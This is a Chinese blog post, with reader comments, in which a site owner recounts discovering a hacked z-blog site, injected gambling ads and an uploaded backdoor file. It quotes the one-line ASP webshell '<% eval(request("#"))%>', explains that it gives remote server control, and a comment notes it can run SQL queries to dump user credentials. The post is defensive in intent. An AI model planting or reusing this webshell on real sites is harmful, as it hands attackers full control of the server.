當前位置:首頁 ? 網賺項目 ? 正文

分類頁和文章頁“當前位置”下方廣告(移動版)

愛小志博客網站被黑及其應對

763 人參與  2013年04月15日 16:34  分類 : 網賺項目  評論

今天中午12點多用手機訪問我的網站還是好好的,等到下午4點多來打開網站的時候,發現網站打開之后,頁面錯位亂碼,原來是網站被黑客攻擊了,于是,我立刻用FTP軟件登錄虛擬主機空間,并且,按照時間順序排列文件。發現果然不對勁,有人在我虛擬主機空間上傳了一個index.asp文件,然后我查看z-blog 2.1原版源碼程序,發現并沒有index.asp文件,所以,我斷定,這個肯定是黑客上傳上上去的,于是,我把這個文件立刻刪除了,在訪問網站的時候,果然能夠正常訪問了。另外,我看見還有一個文件夾名稱為“inc”,其日期是今天最新的日期,我打開進入,發現里面有一個文件名稱是coon.asp,但是,我查看原版的z-blog程序,發現并沒有一個文件夾是inc,所以,我就果斷把這個文件刪除了。

下面圖片是我網站被攻擊之后打開的頁面:

image

我們發現,其中有一些亂碼的字符,比如“???”,“br>”等等,之后,我又查看了網頁的源代碼,發現在代碼的底部,掛的全部都是“博彩”和“賭場”的網站廣告代碼,

image

這個情況,應該說我不是第一次遇見了,但是,網站打開之后是亂碼的情況還是第一次出現,以前我有個網站也是掛的什么淘寶商城或者是什么醫療機構,或者是什么博彩網站的廣告,但是都是隱藏起來的網站鏈接和代碼,一般我們直接打開網站之后不能直接看見這些鏈接,所以,我們也通常很難發現這些惡意廣告鏈接,這些隱藏的惡意鏈接,很容易造成我們網站被百度,谷歌等網站降權,甚至網站被K,所以,我們需要經常查看自己的網站首頁源碼,最好是下載查看和分析網站日志。

另外,我通過把inc文件夾里面的的conn.asp文件下載到本地,用記事本打開之后,發現里面的代碼只有一段,如下圖:

image

我們通過在百度搜索這段代碼,發現果然有很多網站有被掛上這段代碼:

image

而且,很多掛上這個代碼的,都是網站的首頁標題,不得不說,網站管理員到底干哈去了?

愛小志估計代碼中的“qweqwe1”應該是一個人的網絡用戶名,于是我們在百度搜索qweqwe1:

image

發現用戶名稱帶有“qweqwe1”字符的果然不在少數,光搜索結果就達到了2萬多條,這說明,用戶名為qweqwe1的黑客真的是很囂張!

還有,我們搜索“eval request”果然真相浮出了水面:

image

答案是“<% eval(request("#"))%>這句話是一句話小馬的服務端,入侵者能利用lake2的客戶端進行連接,從而得到一個網站的最高權限,更甚至,拿下這臺服務器,注意站點的安全了lz”,黑客已經拿到了網站的服務器控制端。

通過這些分析,我們已經大概知道了網站服務器的問題,所以,愛小志認為,作為站長的我們,需要加強網站的安全的管理,就像這篇文章所說的《關于網賺——我想對大家說的》“黑客可以決定一個網站的生存”,所以,作為站長,尤其是個人站長的我們,需要經常對網站進行備份,備份最好是對整站進行備份,如果可以,每天都需要備份一次數據庫,每周備份一次網站所有文件。備份其實很簡單,只需用FTP軟件登錄網站虛擬主機空間,下載mdb數據庫即可,其中,z-blog的數據庫文件路徑為:zb_users\DATA\***.mdb,其中***為您數據庫的文件名稱。

后記:作為個人站長其實很不容易,樹大招風,何況愛小志這棵樹還沒有“發芽”,幾乎就要被黑客扼殺在襁褓之中,究竟是愛小志得罪了各位,還是各位競爭對手網站看不慣愛小志博客呢?

另外,如果您有更好的應對措施,可以在下方給我們留言,謝謝!

來源:艾樂博客(微信/QQ號:178551440),轉載請保留出處和鏈接!

本文鏈接:http://www.ztpilu.tw/?id=68

文章底部廣告(移動版)
百度分享獲取地址:http://share.baidu.com/

本文標簽:愛小志博客  網站被黑  

加入【網絡營銷聯盟】QQ群:59514883(加群驗證:后海博客)

這里的內容可以隨意更改,在后臺-主題配置中設置。

百度推薦獲取地址:http://tuijian.baidu.com/,百度推薦可能會有一些未知的問題,使用中有任何問題請直接聯系百度官方客服!
<< 上一篇 下一篇 >>
評論框上方廣告(PC版)
評論框上方廣告(移動版)

  • 評論(11)
  • 相關文章

◎歡迎參與討論,請在這里發表您的看法、交流您的觀點。
  • 1樓 音樂人生網賺 2013-04-15 19:28:04 回復
    我說下午來你的博客 怎么是這樣呢 以為是 主機有啥問題呢 呵呵
  • 2樓 PHP程序員 2013-04-15 22:18:33 回復
    還好及時發現了,要么百度收錄猛增,都不知道怎么回事,原來都給別人做宣傳了。
  • 3樓 loveseatao 2013-04-15 22:22:27 回復
    您知道有啥防黑技巧嗎?
  • 4樓 智慧網賺 2013-04-15 22:29:01 回復
    來問候下。
  • 5樓 王攀網賺博客 2013-04-15 23:16:43 回復
    很好的經驗,以后自己也嫩個多多防范呢
  • 6樓 小蝦網賺 2013-04-16 14:34:13 回復
    恩恩,多多積累經驗!
  • 7樓 吵吵 2013-04-17 22:51:50 回復
    7年前就玩過一句話木馬,到今天了還存在呢。qweqwe1只是發送的一個變量。如果這個變量是一句sql語句,如select * from users那么所有的用戶名和密碼都會顯示出來。
  • 8樓 loveseatao 2013-04-18 07:03:18 回復
    那站點是如何防止呢?
  • 9樓 好千度兼職網 2013-04-19 09:26:50 回復
    要不是今天來你的博客看看,我還不知道我的網站被黑了,網站底部出現很多百家樂等廣告,我以為是系統臨時添加的,結果FXP查看下發現和你的一樣,有個文件被修改過,日期在三月底,坑爹啊!!!趕緊刪除,再把那個文件上傳。接著修改FXP密碼空間登錄密碼,我擦,這事我都能碰見!
  • 10樓 loveseatao 2013-04-19 16:17:41 回復
    以后日子還長著呢!要多多注意!
  • 11樓 吵吵 2013-04-19 22:10:25 回復
    具體怎么得到權限有很多方法和漏洞,一時也說不完,我原來玩黑客的時候就是因為想象空間非常大,各種意想不到的技術層出不窮。這個要具體分析的,你要搞更多的資料分析。

我是標題

    內容的形式各種各樣,可以是文本,也可以是各種廣告等。

網賺博客 | 網賺論壇 | 任務賺錢 | 掛機賺錢 |

Powered By 艾樂博客 版權所有 遼ICP備11008011號-1

三肖中特管家婆特期期准